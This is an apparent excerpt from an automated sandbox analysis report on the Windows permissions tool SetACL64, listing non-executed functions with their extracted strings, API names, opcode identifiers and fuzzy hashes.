                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Startup
                                                  • String ID:
                                                  • API String ID: 724789610-0
                                                  • Opcode ID: e2e48b089702cd41e97987c4de5919cfb4dbdded5e8bd07c72deee5bbe57a52e
                                                  • Instruction ID: 91325de472e8dd725f095c479e88ee92f4869fc36a49da94d5acd92c76b856d7
                                                  • Opcode Fuzzy Hash: e2e48b089702cd41e97987c4de5919cfb4dbdded5e8bd07c72deee5bbe57a52e
                                                  • Instruction Fuzzy Hash: 89F05E31D0864285FB51FF16E8513B5A3A0FF4D324FC00032C54D46262DE6DE0158F60

                                                  Non-executed Functions

                                                  Function 00007FF7C172E530 Relevance: 177.8, APIs: 61, Strings: 39, Instructions: 2831COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$SimpleString::operator=$ErrorLast$Information$Delete$DescriptorSecurity$Valid$ControlConvertEqualFreeLocalString
                                                  • String ID: DACL$ DACL: [error:$ Group: $ Group: [NULL]$ Group: [empty]$ Group: [error:$ Owner: $ Owner: [NULL]$ Owner: [empty]$ Owner: [error:$ SACL$ SACL: [error:$(not_protected$(protected$(pseudo_protected$+auto_inherited)$: $: [NULL]$: [empty]$:[NULL]$:[empty]$:[error:$> because a filter keyword matched.$> failed with: $> has a NULL security descriptor (granting full control to everyone) and is being ignored.$DACL$Group:$Group:[NULL]$Group:[empty]$Group:[error:$ListSD$Omitting ACL of: <$Owner:$Owner:[NULL]$Owner:[empty]$Owner:[error:$Parsing the SD of <$SACL$The object <
                                                  • API String ID: 503136041-36202760
                                                  • Opcode ID: 95b1e73e3a08943be6edc322f9fce221ccbe777883c1dbf8b4f712d1b5456688
                                                  • Instruction ID: d2ac2f4798ae3649999505ea34374ac1d6804de63142b37175af5120d911c3e0
                                                  • Opcode Fuzzy Hash: 95b1e73e3a08943be6edc322f9fce221ccbe777883c1dbf8b4f712d1b5456688
                                                  • Instruction Fuzzy Hash: 5453A462A097C295EB20EF26D8443EDA360EB49368FD04131D65D476EBDFBCE689C350
                                                  Function 00007FF7C1701A30 Relevance: 157.3, Strings: 121, Instructions: 6075COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Type 'SetACL -help' for help.$ could not be processed!$ could not be set!$ in a parameter option -ace specified: $ in a parameter option -dom specified: $ in a parameter option -lst specified: $ in a parameter option -op specified: $ in a parameter option -os specified: $ in a parameter option -trst specified: $-ace$-actn$-bckp$-clr$-dom$-fltr$-grp$-help$-ignoreerr$-log$-lst$-on$-op$-os$-ot$-ownr$-raw$-rec$-rst$-silent$-trst$> in a parameter option -ace specified: $> in a parameter option -dom specified: $> in a parameter option -grp specified: $> in a parameter option -lst specified: $> in a parameter option -op specified: $> in a parameter option -ownr specified: $> in a parameter option -trst specified: $ERROR (internal) while processing command line: Action: $ERROR (internal) while processing command line: Action: CLEARDACL could not be set!$ERROR (internal) while processing command line: Action: CLEARSACL could not be set!$ERROR (internal) while processing command line: Action: DELORPHANEDSIDS could not be set!$ERROR (internal) while processing command line: Action: RESETCHILDPERMS could not be set!$ERROR (internal) while processing command line: Action: SETINHFROMPAR could not be set!$ERROR (internal) while processing command line: Backup/Restore file: $ERROR (internal) while processing command line: list options: $ERROR (internal) while processing command line: object flags: $ERROR (internal) while processing command line: orphaned SID deletion options: $ERROR (internal) while processing command line: recursion type could not be set!$ERROR in command line: Invalid ACL type (where) entry $ERROR in command line: Invalid access mode entry $ERROR in command line: Invalid action specified: $ERROR in command line: Invalid domain action entry $ERROR in command line: Invalid entry <$ERROR in command line: Invalid inheritance entry $ERROR in command line: Invalid input file (csv) entry in a parameter option -trst specified: $ERROR in command line: Invalid list format entry $ERROR in command line: Invalid list what entry $ERROR in command line: Invalid number of entries in parameter for option -op specified: $ERROR in command line: Invalid object type specified: $ERROR in command line: Invalid option specified: $ERROR in command line: Invalid parameter for option -clr specified: $ERROR in command line: Invalid parameter for option -rst specified: $ERROR in command line: Invalid protection entry $ERROR in command line: Invalid recursion type specified: $ERROR in command line: Invalid trustee action entry $ERROR in command line: No parameter found for option $ERROR while processing command line: ACE: $ERROR while processing command line: Domain: $ERROR while processing command line: Owner: $ERROR while processing command line: Trustee file: $ERROR while processing command line: Trustee: $ERROR while processing command line: object (name, type): $ERROR while processing command line: primary group: $INFO: The restore action ignores the object name parameter (paths are read from the backup file). However, other actions that requ$ProcessCmdLine$WARNING: The parameter <%s> contains a double quotation mark (". Did you unintentionally escape a double quote? Hint: use <"C:\\">$ace$aud_fail$aud_fail,aud_succ$aud_succ$aud_succ,aud_fail$clear$cont$cont_obj$cpydom$cpytrst$csv$dacl$dacl,sacl$delorphanedsids$deny$domain$file$grant$list$obj$own$p_c$p_nc$prn$reg$remdom$remtrst$repldom$repltrst$restore$revoke$rstchldrn$sacl$sacl,dacl$sddl$set$setgroup$setowner$setprot$shr$srv$tab$trustee$wmi$yes
                                                  • API String ID: 0-425451505
                                                  • Opcode ID: 6b2fc4d373cf05abc5e4d6a0f530dc29495f5d2a2d032dd04ea78fda412acef8
                                                  • Instruction ID: 1a550e23831c1b2226f35cb1fc20134a6e09d52c0896bc018e772e68017005a5
                                                  • Opcode Fuzzy Hash: 6b2fc4d373cf05abc5e4d6a0f530dc29495f5d2a2d032dd04ea78fda412acef8
                                                  • Instruction Fuzzy Hash: A3D33261A5978294EB20FF62DC512F9A360FF99364FC11032D50E4BADBEEACD645C360
                                                  Function 00007FF7C1741DAC Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 169libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule
                                                  • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                  • API String ID: 667068680-295688737
                                                  • Opcode ID: 8c265c905f78d9314ea8cbef84c94e4164f9315dedd1d7019d0be5ccefc16711
                                                  • Instruction ID: ae664a0ba7b937bf104544c2aa0c5fea8c1b444ccc4b6a3ac8d1ea9fd0873748
                                                  • Opcode Fuzzy Hash: 8c265c905f78d9314ea8cbef84c94e4164f9315dedd1d7019d0be5ccefc16711
                                                  • Instruction Fuzzy Hash: D8A180A4A19B0791EB04EF66BC58468B7A5BB0E7A5FC45031C84D47326EFBDE19DC320
                                                  Function 00007FF7C1727B10 Relevance: 73.4, APIs: 30, Strings: 11, Instructions: 1631COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$Concurrency::cancel_current_taskDescriptorFreeLocalSecurity$ConvertString
                                                  • String ID: " $> because a filter keyword matched.$> because neither owner, group, DACL nor SACL were backed up.$> failed with: $>: $DoActionRestore$Input file for restore operation opened: '$Omitting SD of: <$Restoring SD of <$Restoring SD of: <$Writing SD to <
                                                  • API String ID: 143920484-3190023557
                                                  • Opcode ID: 15bc8f1a26296f697d3e6f5c2711eff66c31bdb87e4d1b345efa8cdd7b4d4860
                                                  • Instruction ID: 0302c7a944a7feb35b374ce3ec547d8c1c91983fad989663a949c6bea3e1f089
                                                  • Opcode Fuzzy Hash: 15bc8f1a26296f697d3e6f5c2711eff66c31bdb87e4d1b345efa8cdd7b4d4860
                                                  • Instruction Fuzzy Hash: 6FF2A372A04B8185EB20AF76D8403ED6361FB487B8F905231EA5D47AEADFBCD585C350
                                                  Function 00007FF7C1738360 Relevance: 49.9, APIs: 25, Strings: 3, Instructions: 902COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Valid$ErrorLast$DeleteInformation
                                                  • String ID: > was not found in domain <$Account <$ProcessACEsOfGivenDomains
                                                  • API String ID: 2636496183-3371799133
                                                  • Opcode ID: 9a3de9c15898c57846f777a987bea00d9bf1c6b9597bda2110fe323b3954fc78
                                                  • Instruction ID: fd9e01890ddf05ce178a24b5f8a414f88d95fb750e8f0c9f95e2646023d68b7d
                                                  • Opcode Fuzzy Hash: 9a3de9c15898c57846f777a987bea00d9bf1c6b9597bda2110fe323b3954fc78
                                                  • Instruction Fuzzy Hash: 3E827162B1878285EB10AF6AD4443ADA361FB497B8FD04235DA5D47BDADFBCE190C310
                                                  Function 00007FF7C173A630 Relevance: 45.9, APIs: 18, Strings: 8, Instructions: 388memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: AllocString$DescriptorSecurityValid_invalid_parameter_noinfo_noreturn
                                                  • String ID: GetSD$SetSD$__systemsecurity$__systemsecurity=@$t5x$$x$2z$w
                                                  • API String ID: 1218313072-3940533286
                                                  • Opcode ID: 573fd55f4af3a90e586db8418e43b378526fcc2e4e962f79aabb54a16630bbf7
                                                  • Instruction ID: f06402369aaa7f097f833a8a59561b750d9e82f58d50f318d0e99dc7ae0f9426
                                                  • Opcode Fuzzy Hash: 573fd55f4af3a90e586db8418e43b378526fcc2e4e962f79aabb54a16630bbf7
                                                  • Instruction Fuzzy Hash: A6F18936B09B0286EB54EF26E4553ACB3A0EF48B64F944435CA4D83B96DFBCD454C360
                                                  Function 00007FF7C17142A0 Relevance: 38.8, APIs: 18, Strings: 4, Instructions: 286COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastProcess$CloseCurrentHandleLookupOpenPrivilegeTokenValue
                                                  • String ID: failed with: $ the privilege $Enabling$SetPrivilege
                                                  • API String ID: 152255395-1151176482
                                                  • Opcode ID: 98658c3223ea42c8e2fd826e98f666b88e57f772a3a703dd5e8032af214ad707
                                                  • Instruction ID: b4388f663155be75bece0bb29e691e3ef76f1f1a1ce4b7c66d579c3a7e9c5b3d
                                                  • Opcode Fuzzy Hash: 98658c3223ea42c8e2fd826e98f666b88e57f772a3a703dd5e8032af214ad707
                                                  • Instruction Fuzzy Hash: 4CD18672B1474281FB00EF66E4443AD6761EB497B8FA14235DA5E13AEADFBCE190C310
                                                  Function 00007FF7C1757674 Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                  • String ID:
                                                  • API String ID: 3939093798-0
                                                  • Opcode ID: c1a13ead2e16a132016a420d339e8d407b4230b911f8cc16b805d80e8827ded2
                                                  • Instruction ID: 7c4c18335df79af66ffb0c1250ee8c4565d1f389cda378b66e83430f7be7d83e
                                                  • Opcode Fuzzy Hash: c1a13ead2e16a132016a420d339e8d407b4230b911f8cc16b805d80e8827ded2
                                                  • Instruction Fuzzy Hash: B7716B22F04A4289FB51EF66D4606BCA7A0BF4CB64FC44435CE1D57696EFBCA845C360
                                                  Function 00007FF7C1742E8C Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: b089a036664126cd0b55730891b2820b0630cf2b127659524579cdc58d050a6c
                                                  • Instruction ID: ce1df5b451c5d5f7f7adb6522fd240fb6ce0a18ad685d74dc21816fa9d229e63
                                                  • Opcode Fuzzy Hash: b089a036664126cd0b55730891b2820b0630cf2b127659524579cdc58d050a6c
                                                  • Instruction Fuzzy Hash: 34315372708B8185EB60DF62E8403EDB364FB89754F84443ADA4D47B96DF78D558CB20
                                                  Function 00007FF7C173F9C0 Relevance: 9.5, Strings: 7, Instructions: 710COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_Setgloballocalestd::locale::_
                                                  • String ID: APPLICATION PACKAGE AUTHORITY$Font Driver Host$IIS AppPool$NT AUTHORITY$NT SERVICE$NT VIRTUAL MACHINE$WINDOW MANAGER
                                                  • API String ID: 2016263034-1572346215
                                                  • Opcode ID: 1fb07fcdeecce9f14301a7ac34e795235f9f09835de906e15c143d3a66afb55b
                                                  • Instruction ID: 7c0341c2844c0523c06c25abbc3fe5d1cbaa2a1659eeb6f46299931a9c8c4e74
                                                  • Opcode Fuzzy Hash: 1fb07fcdeecce9f14301a7ac34e795235f9f09835de906e15c143d3a66afb55b
                                                  • Instruction Fuzzy Hash: 91527F26B05A0685EF14EF66D0581BDA7A0EB8DFD8B854436CE0E137A6EE7DD444C360
                                                  Function 00007FF7C175C76C Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: c7e3b804aa443ecddc5aa38c83e1479257d163bfb5c256670d9298fc1dc11c8a
                                                  • Instruction ID: 54f2246d0455df1e844fcca89712d7b28e4d12443baa287020dab143d9b95e36
                                                  • Opcode Fuzzy Hash: c7e3b804aa443ecddc5aa38c83e1479257d163bfb5c256670d9298fc1dc11c8a
                                                  • Instruction Fuzzy Hash: 78A1E762B18A8581EB10EF6394102BAE7A4FB8CBF4F944136DE5D07B86DFBCE4458310
                                                  Function 00007FF7C17486C8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 0c75d53fa4f789302832d1f0c4a661b2f4dd75274d5b0a99b56319323675b894
                                                  • Instruction ID: 489a32da95c599ce50c895f43708919a43809b7d5b4455c68631e09fda6baad2
                                                  • Opcode Fuzzy Hash: 0c75d53fa4f789302832d1f0c4a661b2f4dd75274d5b0a99b56319323675b894
                                                  • Instruction Fuzzy Hash: 62319132608B8186DB60DF66E8402AEB3A0FB8D764F940136EB8D43B96DF7CD555CB10
                                                  Function 00007FF7C1717580 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 826COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$_invalid_parameter_noinfo
                                                  • String ID: %
                                                  • API String ID: 1283921372-2567322570
                                                  • Opcode ID: fe15a6ac4528cf41c533b560c1c99647058aec793d08cb73c2d8515a42d6291c
                                                  • Instruction ID: d0c9efe17c2654536e28a57b5311861927bc00f6298c631ee5cdb35cfed95c33
                                                  • Opcode Fuzzy Hash: fe15a6ac4528cf41c533b560c1c99647058aec793d08cb73c2d8515a42d6291c
                                                  • Instruction Fuzzy Hash: 5772FF22B18A858AEB11DF6AD0403ADB3B1EB48B98FA54031DF4D57B9ADF7CD545C320
                                                  Function 00007FF7C173C250 Relevance: 7.8, APIs: 5, Instructions: 305COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e81314747b826c716fa44dea94a216081fde13e1c2a81abd4463a414bef4ca2a
                                                  • Instruction ID: 24947e0bce3123c851c4d18bd8b7f53a84ef4d37f56ae465c1883175e7d575cb
                                                  • Opcode Fuzzy Hash: e81314747b826c716fa44dea94a216081fde13e1c2a81abd4463a414bef4ca2a
                                                  • Instruction Fuzzy Hash: 30B1A272A0874181EB14AF26E44436DB3A5EB5CBE8FD04136DB8C07A9ADFBCD591C750
                                                  Function 00007FF7C1714810 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
